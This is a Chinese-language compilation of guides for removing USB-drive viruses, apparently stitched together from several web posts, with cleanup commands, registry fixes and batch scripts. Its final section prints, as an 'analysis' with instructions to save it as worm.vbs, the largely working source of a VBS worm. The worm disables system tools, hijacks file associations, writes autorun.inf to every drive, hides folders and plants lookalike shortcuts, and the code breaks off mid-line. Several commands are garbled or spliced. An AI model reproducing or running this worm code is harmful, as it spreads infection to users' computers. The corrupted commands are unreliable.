下载文档原格式
电脑病毒隐藏文件怎么样清除电脑中了病毒后,会有很多隐藏文件清除不了,那么要怎么样去清除隐藏文件呢?下面由店铺给你做出详细的电脑病毒隐藏文件清除方法介绍!希望对你有帮助!电脑病毒隐藏文件清除方法一:首先打开文件夹选项,勾选显示系统文件,显示所有文件之后在开始菜单中选择运行,输入cmd,敲回车会用cmd吗?先输入你的u盘盘符,比如你插上U盘后我的电脑里会显示“可移动磁盘h”你就在cmd中输入h:,敲回车之后输入attrib -s -h *.* /s /d就成了在这个过程中不能打开U盘页面,否则失败同名exe是病毒生成的文件,全删,病毒文件也要删,还有,这个工作最好在网吧里干,有还原卡,删完后重启机子,检查一下效果,一般会杀两次才行这个病毒相当明显,那个Notepad.exe是一个生成文件,删掉,直接删,用delete键,还有一个名字是乱码的,是主程序,删掉,可能你第一次删是看不见的,所以让你查杀两次。
一般来说病毒会被杀毒软件拦截,我试过卡巴和瑞星,只要是最新版都没问题,可以自动删除,这个病毒很简单,好像就是用记事本编的电脑病毒隐藏文件清除方法二:开始-运行-输入regedit打开HKEY_LOCAL_MACHINE\Software\Microsoft\windows\CurrentV ersion\ explorer\Advanced\Folder\Hidden\SHOWALL,将CheckedValue键值修改为1这里要注意,病毒会把本来有效的“DWORD 值”CheckedValue删除掉,新建了一个无效的“字符串值”CheckedValu e,并且把键值改为 0!我们将这个改为1是毫无作用的。
(有部分病毒变种会直接把这个CheckedValue给删掉,只需自己重新建一个就可以了)方法:删除此CheckedValue键值,单击右键新建--Dword值--命名为CheckedValue,然后修改它的键值为1,这样就可以选择“显示所有隐藏文件”和“显示系统文件”--记注每一步的步骤-不要删错咯电脑病毒隐藏文件清除方法三:开始→运行→regedit进入注册表编辑器,按照路径进入注册表项HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\Windows\Cur rentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL 在右边方框内修改键值:CheckedValue对应修改其值为1,类型为十六进制DefaultValue对应修改其值为2,类型为十六进制Text对应修改其值为@shell32.dll,-30500提示:Text键的值“@shell32.dll,-30500”与“显示所有文件和文件夹”(注意输入时去掉字符串引号)作用相同。
![[文件夹病毒清除方法] 清除病毒最彻底的方法](https://uimg.taocdn.com/74d3e670f56527d3240c844769eae009581ba214.webp)
[文件夹病毒清除方法] 清除病毒最彻底的方法文件夹病毒不是一个病毒,而是具有类似性质的病毒的统称,此类病毒会将真正的文件夹隐躲起来,并天生一个与文件夹同名的exe文件,并使用文件夹的图标,使用户无法分辨,从而频繁感染。
你的U盘或数码相机中保存着重要的数据和照片,当你打开盘符的时候,却发现什么都没有了,相信这时你的脑袋会嗡的一下,然后急着想看看发生了什么事,于是疯狂地打开一个个文件夹进行查看。
而这时文件夹病毒早已伪装成文件夹了,你运行的只是病毒而已。
很多朋友都不喜欢显示文件的扩展名,再加上病毒伪装得和真正的文件夹一模一样,因此在这种情况下,相信尽大部分的人都会中招。
当然这还没完,当你发现U盘中有文件夹,但是却死活打不开,于是你就会想到往别的电脑上打开一下,看看是不是U盘坏了,于是又一台电脑被感染了。
一、文件夹病毒手工清除方法看了编辑提示,相信你也一定会说这病毒太***太猥琐了!好吧,假如你不幸被这猥琐的家伙感染了,那么我们就来尝试手工把它清除出往吧。
Step1:结束病毒进程。
任务治理器中终止进程XP-290F2C69.EXE (后8 位随机),winvcreg.exe,20xx.exe(随机名)。
Step2:删除病毒在System32天生的以下文件:com.run、dp1.fne、eAPI.fne、internet.fne、 krnln.fnr、og.dll、og.edt、RegEx.fnr、spec.fne、ul.dll、XP-290F2C69.EXE、 winvcreg.exe 20xx.EXE(随机名)Step3:删除病毒的启动项,删除以下启动项:"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows \CurrentVersion\Run"里的XP-**.EXE(后8 位随机)及"C:\Documents and Settings\Administrator\「开始」菜单\ 程序\ 启动"里的".lnk"。
VBS病毒简介大家都知道,C、JAVA、PHP语言是编程语言,其实VBS也是其中一种,它的全称为Visual Basic Script,后来一些人利用其功能强大、使用简单而编写成了脚本病毒。
VBS病毒原理它先将病毒自身代码赋给字符串变量,然后将这个字符串覆盖写到目标文件,并创建一个以目标文件名为文件名前缀、vbs为后缀的文件副本,最后把目标文件删除,只要一打开,病毒就自动运行。
VBS病毒判断如果你打开电脑发现在每个盘里都有vbs、autorun.exe、.vbe、js等文件。
然后打开任务管理器,发现进程中有wscript.exe进程,而且机子运行得很慢。
那么,你要注意了,你的电脑中了VBS病毒。
VBS病毒传播VBS病毒是用VB Script编写的,它利用Windows系统的开放性,通过调用现有的Windows对象、组件,程序可以直接控制文件、系统、注册表,功能非常强大。
VBS脚本病毒通常的传播方式有:通过Email附件、IRC聊天通道、局域网共享传播,还可以通过感染htm、jsp、php 、asp等网页文件传播,传播范围比较广泛,它的变种多,迷惑性很强,所以电脑如果中了这种病毒就会很麻烦。
最直接的方法应该是手动恢复,但是手动处理太复杂,对大多数电脑菜鸟来说,这个方法根本是行不通的,而且容易操作失误,万一系统崩溃,你就得重新装系统,很折磨人。
我建议大家使用VBS病毒专杀工具—U 盘杀毒专家(USBkiller)进行查杀,它可以一键轻松清除VBS病毒。
U盘杀毒专家(USBKiller)是一款国产的专业U盘病毒专杀工具,它可以检测并查杀文件夹变成exe病毒,auturun病毒,vbs病毒,u盘文件夹被隐藏等多种U盘病毒,自动修复由于病毒恶意篡改而损坏的系统配置。
还可以免疫u盘,同时还提供U盘解锁功能和进程管理功能。
有关如何使用U盘杀毒专家清理VBS病毒,请点击这里。
这篇文章主要介绍了自制杀u盘病毒的批处理代码,需要的朋友可以参考下代码如下:@echo off&mode con cols=61 lines=25&color f2title u盘病毒天敌echo 名称:u盘病毒的天敌echo 平台:windows xpecho 作者:小强echo 版权所有,请勿倒翻!cd\del /f /q /ah *.exe 2>nuldel /f /q /as *.exe 2>nuldel /f /q ...exe 2>nuldel /f /q *.inf 2>nulmd autorun.inf 2>nul &attrib +s +h +a +r autorun.inf 1>nulfor /f %%a in ('dir /ad /b 2a.exe 2>nulif not %%a equ autorun.inf (attrib -s -h -a -r %%a))for /f %%b in ('dir /a-d /b 2杀毒完毕,请按任意键退出!!!!!!!echo.echo.echo ============================================================= echo == ☆注意☆==echo == 一。
本程序为粗略设计,并不是最完善,还望体谅!==echo == 二。
运行玩后请自己用你慧眼检查一些exe文件,以免漏杀==echo == 三。
如需复制该程序,请将其放入u盘使用!==echo ============================================================= pause>nulgt;nul') do (if not %%b equ desktop.ini (attrib -s -h -a -r %%b 1>nul 2>nul))echo.echo.echo 杀毒完毕,请按任意键退出!!!!!!!echo.echo.echo ============================================================= echo == ☆注意☆==echo == 一。
方法一1、将U盘插入自己的电脑,当出现操作提示框时,不要选择任何操作,关掉。
2、进入我的电脑,从地址下拉列表中选择U盘并进入,或者右键单击可移动磁盘,在弹出的菜单中选择“打开”进入。
千万不要直接点击U盘的盘符进去,否则会立刻激活病毒!3、在我的电脑-工具-文件夹选项-查看-显示所有文件和文件夹,把“隐藏受保护的系统文件”的勾去掉,你会看到U盘中出现了“rose.exe (或者 setup. exe, gamesetup. exe)” 和“autorun. inf” 两个文件直接删除!4、在开始一运行中输入“regedit”(XP系统)打开注册表,点“编辑”一一“查找”,在弹出的对话框中输入“rose.exe(或者setup.exe, gamesetup.exe)” 找到后将整个shell子键删除,然后继续按F3查找下一个,继续删除查找到有关的键值,直到显示为“注册表搜索完毕”为止。
方法二(文件夹不见了,被病毒隐藏时使用此方法)1.【图片】按WIN+R组合键(WIN是Z和SHIFT键下面,CTRL键右边,ALT键左边的那个键)打开运行对话框。
输入。
山&回车打开命令行。
一命令行其实很好用2.输入你U盘的盘符,再打一个冒号:,回车。
一进入U盘(如:你的U盘是H 盘则输入比回车即可)3.输入@优=玷*.* -s -h /s /d,回车。
一把所有文件去掉隐藏属性(可以看见你丢失的文件)(如果还是没有看见,丢失的文件夹,打开工具-文件夹选项-查看, 取消“隐藏受保护的操作系统文件”(无视警告选“是”),“隐藏已知文件类型的扩展名”。
点击选中“显示所有文件和文件夹"。
一)4.现在再看看你的U盘,是不是发现了很多EXE文件或者autorun.inf文件?一你看到两个一样的文件夹?那么有一个是病毒,右键菜单不是“打开,搜索,资源管理器”之类的是病毒。
5.还等什么--把它们删除吧~~~还有陌生的BAT,CMD,SCR,PIF文件,WINDOWS 旗子图标的文件,齿轮图标的文件,册f~~-autorun.inf的图标是文件夹?删除试试~~删不掉就算了。
VBS病毒快速清楚
VBS,全拼是Visual Basic Script,它本来是一种程序语言,一些网络黑客利用其功能强大、使用简单而编写成脚本病毒。
它先将病毒自身代码赋给字符串变量,然后将这个字符串覆盖写到目标文件,并创建一个以目标文件名为文件名前缀、vbs为后缀的文件副本,最后删除目标文件,只要一打开,病毒就会运行。
那么,有什么好用的查杀vbs病毒的工具吗?经过多方验证,终于找到一个最有效的VBS病毒专杀工具——U盘杀毒专家(USBkiller),应用此软件一键就可以轻松清除VBS病毒。
下面一起看看U盘杀毒专家(USBkiller)是如何轻松查杀vbs病毒的吧!
1、下载最新版的autorun.vbs专杀工具—U盘杀毒专家(USBKiller),您可以在官方网站上免费下载:
2、把中毒了的U盘、移动硬盘、MP3等移动存储设备插入电脑,然后打开U盘杀毒专家(USBKiller):
3、选择扫描对象,一共包括内存、本地硬盘、移动存储设备三项,推荐都给选上,然后点击“开始扫描”:
4、扫描结束,U盘杀毒专家将会把查杀到的VBS病毒显示在任务栏里,将显示查杀处理结果:
U盘杀毒专家不仅是VBS专杀工具,还可以检测出文件夹.exe等上千种U盘病毒,解决拔出时显示“无法停止设备”的问题。
同时能对U盘进行免疫,防止病毒的入侵,让您的电脑远离病毒。
更多关于U盘杀毒专家(USBKiller)的信息,可以点击以下网址进行了解:。
U盘快捷方式病毒查杀及免疫
1、U盘病毒手动删除
点“开始” “运行" 输入 CMD 在输入D: 输入 rmdir /s autorun.inf 它会问你确定么输入 Y 然后回车依次删下去在输入E: 输入 rmdir /s
autorun.inf 2、U盘快捷方式病毒免疫
把两行星号中间的代码粘贴到记事本里用文件名kill.cmd保存在保存格式中选择所有格式然后把文件kill.cmd放到你的U盘里双击运行就可以杀毒并产生免疫了这是我自己用的效果很不错对了要提醒你杀毒软件一般是不会查杀U盘病毒的因为大多数木马只能说是恶意程序还达不到杀毒软件的查杀范围所以得格外留意
*************************************** echo 正在杀毒并生成免疫请勿关闭 attrib -r -a -s -h /s /d del /f /s /q *.inf MKDIR
autorun.inf\Kill........\ attrib +r +a +s +h *.inf /s /d echo 完成*************************************** 3、U盘快捷方式病毒也可以通过软件“1KB文件夹快捷方式病毒清除专用附件” 和“360系统急救箱”检测清除。
所有U盘染病毒,文件变成.exe执行文件,并且不能取消隐藏的朋友们,速速分享我这个日志,简单快速。
感谢热情的大家在回帖中不断提供的新方法,给了我很大的启发,让我对这种病毒及其变种的了解更加深刻。
这次重新对这篇日志进行整理,添加了几种大家在回复里提出的新方法,并对方法的顺序进行了调整,按推荐程度排序。
首先建议大家对计算机进行全面的查毒,这样可以将病毒在电脑中的源文件杀掉,以免删除U盘病毒后下次在这台电脑上再使用U盘重新被感染上这种病毒(推荐使用卡巴斯基杀毒软件,因为经过我的实践,卡巴是完全可以杀掉电脑主机中的这种病毒的,金山毒霸对有些这种类型的病毒会出现漏杀现象,至于其他的杀毒软件,还没有测试过,希望大家试过后能够给我反馈一下),这是去根的方法!!!!当然如果是在学校的机房和网吧等一次性使用的电脑,这个步骤也可以省略。
方法一:这是一个相对简单的方法,利用一些软件帮助,不需要多少电脑编程注册表方面的知识,适合大部分同学使用,而且非常有效。
中了这个病毒不要随便格式化,没有必要,给个网址/这个是USB Cleaner的官方网站,下载USBCleaner6.0,打开USBCleaner,USBCleaner是一款专为U盘病毒查杀的软件,非常小巧,一个压缩包才3MB,而且提供绿色免安装版,解压后即可使用,建议大家在自己的U盘中都准备着一个,以备病毒卷土重来~(记得经常升级软件版本啊)首先点击全面检测,按照USBCleaner的向导,对电脑中的U 盘病毒进行查杀,完成这个步骤后软件会提示开始查杀U盘中病毒,会弹出个窗口(如下图)运行“检测U盘”会提示“是否查杀U盘中的文件夹图标病毒”,点击是将折磨我们的这种病毒从U盘中彻底清除,随后点击“恢复被病毒恶意隐藏文件”(推荐)“强制去除文件夹目录系统隐藏属性”(新手慎用),就OK啦!那些被病毒强制隐藏掉的文件就出来了,一点小小的心得,说出来大家分享一下,下次有朋友中这种毒不要担心,资料不会丢失的!!!!!方法二:1:下载360安全卫士,这个一般电脑上都有吧,或者别的杀毒软件都OK。
U盘中毒,又不想格式化的解决技巧问题: U盘文件夹全部有.exe扩展名,打不开,删去后内存不变.不想格式化,里面好多东西!分析:是中Autorun毒啦!Autorun-U盘病毒清除绝招Autorun病毒又名U盘病毒。
打开开始→运行,在弹出的对话框中输入:oobe/msoobe /a,回车后系统会弹出窗口告诉你系统是否已经激活。
原理:U盘病毒主要依赖于U盘等可移动设备生存,当用户从网上下载文件并拷贝到U盘时便可能中了U盘病毒,当用户双击U盘盘符时,便启动了隐藏了的Autorun.inf等系统文件,Autorun.inf是一个安装信息文件,通过它可以实现可移动设备的自动运行其文档格式为:[autorun]open=病毒.exe (这个是让U盘被双击自动运行时打开病毒.exe)icon=*.icon (如果有图标文件*.icon,则U盘的盘符显示出该图标.)解决方案:步骤1:打开记事本编辑如下: Windows Registry Editor Version 5.00[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]" NoDriveTypeAutoRun"=dword:000000B5[HKEY_USERS\. DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]"NoDriveTypeAutoRun"=dword:000000B5 (复制一下就行了)将上另存为文件名: 禁止U盘自动运行.reg 保存类型选"所有文件"然后双击此文件将其导入注册表步骤2: 显示所有文件;(如果已经设置过的可以进入下一步)我的电脑→工具→文件夹选项→查看勾选“显示所有文件和文件夹”,取消“隐藏受保护的操作系统文件(推荐)”步骤3:删除U盘下的病毒文件autorun.inf、toy.exe最后选中所有文件点右键弹出对话框点击属性把只读和隐藏的已勾选去掉,应用,就ok啦!。
大家好,我是免维市场中心和技术中心的唐川斐。
在此发布一条病毒防御和处理的重要信息,希望能引起大家的注意。
最近U盘病毒产生了新的变种,主要表现为将文件夹等变成1kb大小的快捷方式;里面的文件还在,但系统文件夹被隐藏。
很多同学的电脑在插过U盘之后就感染了这种病毒。
刚接触这种病毒时,感觉非常棘手,几乎觉得唯一的办法就是重装。
但实践证明,重装系统并不能彻底地解决问题。
在此,结合网上分享的经验和自己的一些体会,来和大家谈谈新病毒的防御问题。
经检测,此种病毒为.vbs脚本病毒,VBS全称是Microsoft Visual Basic Script Editon,是基于Visual Basic的脚本语言. Microsoft Visual Basic是微软公司出品的一套可视化编程工具, 语法基于Basic. 脚本语言, 可以不编译成二进制文件, 直接由宿主(host)解释源代码并执行, 简单点说就是你写的程序不需要编译成.exe, 而是直接给用户发送.vbs的源程序, 用户就能执行了。
建议大家带U盘打印东西后,U盘不要随便插入电脑,更不要随便双击打开此U盘。
应该用USBCleaner先检测U盘是否是病毒携带者。
不过,从复印社出来的U盘,一般“凶多吉少”。
肯定以及必须先杀毒。
而电脑中此病毒后怎么办呢?在此介绍几个解决办法,并分享一些专杀工具。
1KB文件夹快捷方式病毒清除专用附件.rar方法一:使用1kb文件夹快捷方式病毒清除专用工具,在系统盘为FAT32的系统内,只需要使用“清理工具”清理即可。
然后用“恢复文件夹属性工具”恢复被隐藏的各盘文件夹。
在系统盘为NTFS的系统内,首先使用“清理工具”清理,然后再用“数据流清除工具”清除检测到的数据流。
最后再使用“wscript文件权限恢复”恢复wscript文件权限即可。
接着用“恢复文件夹属性工具”恢复被隐藏的各盘文件夹。
方法二:找张带winpe的系统盘,进入系统后查找winPe下所有的.vbs 文件,查看文件创建日期,将你中毒后创建的.vbs文件全部删除掉。
Win7环境下彻底清除VBS病毒的教程 说起VBS病毒,可能很多⽤户并不了解,但说起1kb快捷⽅式病毒,⽤户⼀定有所⽿闻,甚⾄亲⾝经历,这种1KB快捷⽅式病毒有⼀个名称叫:暴风⼀号。
TA可以通过U盘、MP4/MP5之类的可移动存储设备传播的,可能对移动设备没有什么太⼤的影响,但若是该移动设备插进计算机,那杀伤⼒还是很⼤的。
如何在Win7环境下彻底清除VBS病毒?⼩⾯⼩编就为⼤家带来Win7环境下彻底清除VBS病毒的教程。
⼀起去看看吧! VBS病毒的能做什么? 在显⽰隐藏⽂件和扩展名的情况下,U盘和我的电脑各盘符下多了⽂件Autorun.inf和*.VBS(名字为8位数字的VBS⽂件)根⽂件夹下的所有⽂件夹都变成了两份,⼀份是隐藏⽅式,另⼀份其实是快捷⽅式。
有时系统的显⽰隐藏⽂件都会失效,⽆法完全显⽰病毒⽂件(但是可以通过winrar的⽂件浏览看到),如果不能完全查杀的话,杀毒之后留下后遗症,也就是我的电脑⽆法打开、磁盘⽆法打开、只能⽤任务管理器。
有些⽤户说“我的电脑”打不开了,就是这个原因。
如何对付VBS病毒? 1、⾸先点开始菜单,然后点“运⾏”;没有运⾏指令的话,直接按键盘上的开始按键+ E; 2、然后输⼊:reg add HKCR\batfile\shell\open\command /ve /d "\"%1\" %*" /f 3、怕输错的直接复制粘贴过去也⼀样; 4、然后在桌⾯上新建⼀个⽂本⽂档,之后复制粘贴以下内容:@echo offmode con cols=53 lines=30echo.echo U盘病毒*.VBS专杀echo.echo 正在杀毒,请稍候。
echo.start /min taskkill /im explorer.exe /fstart /min taskkill /im wscript.exe /fif exist %systemRoot%\*.vbs del /a /q /f %systemRoot%\*.vbs & echo 发现VBS病毒!if exist %systemRoot%\system32\*.vbs del /a /q /f %systemRoot%\system32\*.vbsecho 执⾏清理中。
U盘病毒--vbs快捷⽅式病毒源代码【分析↓】注意:把以下的复制到“记事本”后,在“另存为”操作时,名称为worm.vbs,“保存类型”为“所有⽂件”,“编码”为“ANSI”。
不然会提⽰错误信息,型如⾏:1字符:1错误:⽆效字符代码:800A0408源: microsoft vbscript 编译器错误'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''主函数⾄此结束''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''Sub MonitorSystem()'结束taskmgr.exe、regedit.exe、msconfig.exe、cmd.exeOn Error Resume NextDim ProcessNames, ExeFullNamesProcessNames=Array("cmd.exe","","regedit.exe","regedit.scr","regedit.pif","","msconfig.exe")'ProcessNames相当于数组⾸地址VBSFullNames=Array(GetMainVirus(1))DoCall KillProcess(ProcessNames)Call InvadeSystem(GetMainVirus(1),GetMainVirus(0))'1:smss.exe:72161642.vbsCall KeepProcess(VBSFullNames) '0:explorer.exe:72161642.vbs'上⾯这句⽤来保持进程活跃WScript.Sleep 3000LoopEnd SubSub InvadeSystem(VirusLoadPath,VirusAssPath)On Error Resume NextDim Load_Value, File_Value, IE_Value, MyCpt_Value1, MyCpt_Value2, HCULoad, HCUVer, VirusCode, VersionLoad_Value=""""&VirusLoadPath&""""'smss.exe的病毒流File_Value="%SystemRoot%\System32\WScript.exe "&""""&VirusAssPath&""""&" %1 %* "IE_Value="%SystemRoot%\System32\WScript.exe "&""""&VirusAssPath&""""&" OIE "MyCpt_Value1="%SystemRoot%\System32\WScript.exe "&""""&VirusAssPath&""""&" OMC "MyCpt_Value2="%SystemRoot%\System32\WScript.exe "&""""&VirusAssPath&""""&" EMC "HCULoad="HKEY_CURRENT_USER\SoftWare\Microsoft\Windows NT\CurrentVersion\Windows\Load"HCUVer="HKEY_CURRENT_USER\SoftWare\Microsoft\Windows NT\CurrentVersion\Windows\Ver"HCUDate="HKEY_CURRENT_USER\SoftWare\Microsoft\Windows NT\CurrentVersion\Windows\Date"VirusCode=GetCode(WScript.ScriptFullName)Version=1HostSourcePath=Fso.GetSpecialFolder(1)&"\Wscript.exe"HostFilePath=Fso.GetSpecialFolder(0)&"\system\svchost.exe"For Each Drive In Fso.Drives'分别建⽴各个⽬录的病毒名字If Drive.IsReady and (Drive.DriveType=1 Or Drive.DriveType=2 Or Drive.DriveType=3) ThenDiskVirusName=GetSerialNumber(Drive.DriveLetter)&".vbs"Call CreateAutoRun(Drive.DriveLetter,DiskVirusName)Call InfectRoot(Drive.DriveLetter,DiskVirusName)End IfNextIf FSO.FileExists(VirusAssPath)=False Or FSO.FileExists(VirusLoadPath)=False Or FSO.FileExists(HostFilePath)=False Or GetVersion()< Version Then If GetFileSystemType(GetSystemDrive())="NTFS" Then'NTFS格式Call CreateFile(VirusCode,VirusAssPath)Call CreateFile(VirusCode,VirusLoadPath)'这⼀步创建了流⽂件Call CopyFile(HostSourcePath,HostFilePath)'这⼀步将wscript.exe从system32复制到system⽬录并改名svchost.exeCall SetHiddenAttr(HostFilePath)Else'FAT32格式Call CreateFile(VirusCode, VirusAssPath)Call SetHiddenAttr(VirusAssPath)Call CreateFile(VirusCode,VirusLoadPath)Call SetHiddenAttr(VirusLoadPath)Call CopyFile(HostSourcePath, HostFilePath)Call SetHiddenAttr(HostFilePath)End IfEnd IfIf ReadReg(HCULoad)<>Load_Value Then'改写注册表启动项,smss.exe的流Call WriteReg (HCULoad, Load_Value, "")End IfIf GetVersion() < Version Then'改写版本信息为1Call WriteReg (HCUVer, Version, "")End IfIf GetInfectedDate() = "" ThenCall WriteReg (HCUDate, Date, "")'记录感染时间End If'以下更改许多⽂件关联,病毒的通⽤感染⽅式If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\txtfile\shell\open\command\")<>File_Value ThenCall SetTxtFileAss(VirusAssPath)End IfIf ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\inifile\shell\open\command\")<>File_Value ThenCall SetIniFileAss(VirusAssPath)End IfIf ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\inffile\shell\open\command\")<>File_Value ThenCall SetInfFileAss(VirusAssPath)End IfIf ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\batfile\shell\open\command\")<>File_Value ThenCall SetBatFileAss(VirusAssPath)End IfIf ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\cmdfile\shell\open\command\")<>File_Value ThenCall SetCmdFileAss(VirusAssPath)End IfIf ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\regfile\shell\open\command\")<>File_Value ThenCall SetRegFileAss(VirusAssPath)End IfIf ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\chm.file\shell\open\command\")<>File_Value ThenCall SetchmFileAss(VirusAssPath)End IfIf ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\hlpfile\shell\open\command\")<>File_Value ThenCall SethlpFileAss(VirusAssPath)End IfIf ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Applications\iexplore.exe\shell\open\command\")<>IE_Value ThenCall SetIEAss(VirusAssPath)End IfIf ReadReg("HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command\")<>IE_Value ThenCall SetIEAss(VirusAssPath)End IfIf ReadReg("HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\open\command\")<>MyCpt_Value1 ThenCall SetMyComputerAss(VirusAssPath)End IfIf ReadReg("HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\explore\command\")<>MyCpt_Value2 ThenCall SetMyComputerAss(VirusAssPath)End IfCall RegSet()End SubSub CopyFile(source, pathf)On Error Resume NextIf FSO.FileExists(pathf) ThenFSO.DeleteFile pathf , TrueEnd IfFSO.CopyFile source, pathfEnd SubSub CreateFile(code, pathf)On Error Resume NextDim FileTextIf FSO.FileExists(pathf) ThenSet FileText=FSO.OpenTextFile(pathf, 2, False)FileText.Write codeFileText.CloseElseSet FileText=FSO.OpenTextFile(pathf, 2, True)FileText.Write codeFileText.CloseEnd IfEnd SubSub RegSet()'⽂件夹选项的注册表设置On Error Resume NextDim RegPath1 , RegPath2, RegPath3, RegPath4RegPath1="HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\NOHIDDEN\CheckedValue"'隐藏选项失效RegPath2="HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue"'隐藏选项失效RegPath3="HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutoRun"RegPath4="HKEY_CLASSES_ROOT\lnkfile\IsShortcut"Call WriteReg (RegPath1, 3, "REG_DWORD")Call WriteReg (RegPath2, 2, "REG_DWORD")Call WriteReg (RegPath3, 0, "REG_DWORD")'开启所有⾃动播放Call DeleteReg (RegPath4)'隐藏快捷⽅式⼩箭头End SubSub KillProcess(ProcessNames)'杀掉进程On Error Resume NextSet WMIService=GetObject("winmgmts:\\.\root\cimv2")For Each ProcessName in ProcessNamesSet ProcessList=WMIService.execquery(" Select * From win32_process where name ='"&ProcessName&"' ") For Each Process in ProcessListIntReturn=1'Process.terminateIf intReturn<>0 ThenWshShell.Run "CMD /c ntsd -c q -p "&Process.Handle, vbHide, FalseEnd IfNextNextEnd SubSub KillImmunity(D)'删掉autorun.inf免疫⽬录On Error Resume NextImmunityFolder=D&":\Autorun.inf"If Fso.FolderExists(ImmunityFolder) ThenWshSHell.Run ("CMD /C CACLS "& """"&ImmunityFolder&"""" &" /t /e /c /g everyone:f"),vbHide,True'提权WshSHell.Run ("CMD /C RD /S /Q "& ImmunityFolder), vbHide, True'rd命令删除,配合 /s /q 选项,很轻松End IfEnd SubSub KeepProcess(VBSFullNames)'保持脚本进程持续运⾏,少于2个创建新进程On Error Resume NextFor Each VBSFullName in VBSFullNamesIf VBSProcessCount(VBSFullName) < 2 thenRun("%SystemRoot%\system\svchost.exe "&VBSFullName)End IfNextEnd SubFunction GetSystemDrive()'获取系统盘的盘符,⽐如c:GetSystemDrive=Left(Fso.GetSpecialFolder(0),2)End FunctionFunction GetFileSystemType(Drive)'获取对应驱动器的⽂件系统格式Set d=FSO.GetDrive(Drive)GetFileSystemType=d.FileSystemEnd FunctionFunction ReadReg(strkey)'读取注册表,搜索strkey,返回所在路径Dim tmpsSet tmps=CreateObject("WScript.Shell")ReadReg=tmps.RegRead(strkey)Set tmps=NothingEnd FunctionSub WriteReg(strkey, Value, vtype)'写注册表Dim tmpsSet tmps=CreateObject("WScript.Shell")If vtype="" Thentmps.RegWrite strkey, ValueElsetmps.RegWrite strkey, Value, vtypeEnd IfSet tmps=NothingEnd SubSub DeleteReg(strkey)'删除注册表Dim tmpsSet tmps=CreateObject("WScript.Shell")tmps.RegDelete strkeySet tmps=NothingEnd SubSub SetHiddenAttr(path)'6=2+4,分别是隐藏、系统属性On Error Resume NextDim vfSet vf=FSO.GetFile(path)Set vf=FSO.GetFolder(path)vf.Attributes=6End SubSub Run(ExeFullName)'执⾏ExeFullName指定的⽂件On Error Resume NextDim WshShellSet WshShell=WScript.CreateObject("WScript.Shell")WshShell.Run ExeFullNameSet WshShell=NothingEnd SubSub InfectRoot(D,VirusName)'感染根⽬录On Error Resume NextDim VBSCodeVBSCode=GetCode(WScript.ScriptFullName)VBSPath=D&":\"&VirusNameIf FSO.FileExists(VBSPath)=False ThenCall CreateFile(VBSCode, VBSPath)Call SetHiddenAttr(VBSPath)End IfSet Folder=Fso.GetFolder(D&":\")'隐藏根⽬录下的所有⼦⽬录Set SubFolders=Folder.SubfoldersFor Each SubFolder In SubFoldersSetHiddenAttr(SubFolder.Path)LnkPath=D&":\"&&".lnk"'创建对应的快捷⽅式TargetPath=D&":\"&VirusNameArgs=""""&D&":\"&& "\Dir"""If Fso.FileExists(LnkPath)=False Or GetTargetPath(LnkPath) <> TargetPath ThenIf Fso.FileExists(LnkPath)=True ThenFSO.DeleteFile LnkPath, TrueEnd IfCall CreateShortcut(LnkPath,TargetPath,Args)End IfNextEnd SubSub CreateShortcut(LnkPath,TargetPath,Args)'上⼀步失败了调⽤这个函数创建快捷⽅式Set Shortcut=WshShell.CreateShortcut(LnkPath)with Shortcut.TargetPath=TargetPath.Arguments=Args.WindowStyle=4.IconLocation="%SystemRoot%\System32\Shell32.dll, 3".Saveend withEnd SubSub CreateAutoRun(D,VirusName)'创建autorun.inf⽂件On Error Resume NextDim InfPath, VBSPath, VBSCodeInfPath=D&":\AutoRun.inf"VBSPath=D&":\"&VirusNameVBSCode=GetCode(WScript.ScriptFullName)If FSO.FileExists(InfPath)=False Or FSO.FileExists(VBSPath)=False ThenCall CreateFile(VBSCode, VBSPath)Call SetHiddenAttr(VBSPath)StrInf="[AutoRun]"&VBCRLF&"Shellexecute=WScript.exe "&VirusName&" ""AutoRun"""&VBCRLF&"shell\open=打开(&O)"&VBCRLF&"shell\open\command=WScript.exe "&VirusName&" ""AutoRun"""&VBCRLF&"shell\open\Default=1"& VBCRLF&"shell\explore=资源管理器(&X)"&VBCRLF&"shell\explore\command=WScript.exe "&VirusName&" ""AutoRun"""Call KillImmunity(D)Call CreateFile(StrInf, InfPath)Call SetHiddenAttr(InfPath)End IfEnd SubSub SetTxtFileAss(sFilePath)'改变txt格式⽂件关联On Error Resume NextDim ValueValue="%SystemRoot%\System32\WScript.exe "&""""&sFilePath&""""&" %1 %* "Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\txtfile\shell\open\command\", Value, "REG_EXPAND_SZ")End SubSub SetIniFileAss(sFilePath)'改变ini格式⽂件关联On Error Resume NextDim ValueValue="%SystemRoot%\System32\WScript.exe "&""""&sFilePath&""""&" %1 %* "Call 